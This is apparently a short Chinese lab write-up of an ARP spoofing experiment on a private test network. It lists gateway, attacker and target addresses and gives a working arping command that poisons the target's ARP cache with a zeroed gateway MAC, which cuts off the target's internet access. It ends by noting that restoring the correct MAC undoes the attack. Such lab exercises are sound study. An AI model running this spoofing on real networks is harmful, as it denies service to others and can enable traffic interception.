ARP欺骗实验

信息收集

网关：IP:192.168.89.2 MAC: 00:50:56:fd:c6:0f

攻击机：IP: 192.168.89.129 MAC: 00:0c:29:e8:f7:fa

靶机：IP：192.168.89.130 MAC：00:0c:29:2f:af:50

攻击机fping -g查看存活主机

查勘表靶机arp缓存表

使用arping进行攻击

arping -S 192.168.89.2 -s 00:00:00:00:00:00 192.168.89.130

靶机ping baidu.com失败

arp -a查看mac地址，网关已改变，攻击成功

只要把网关MAC改为正确地址，即可解除攻击

靶机正常访问baidu.com，网关MAC正常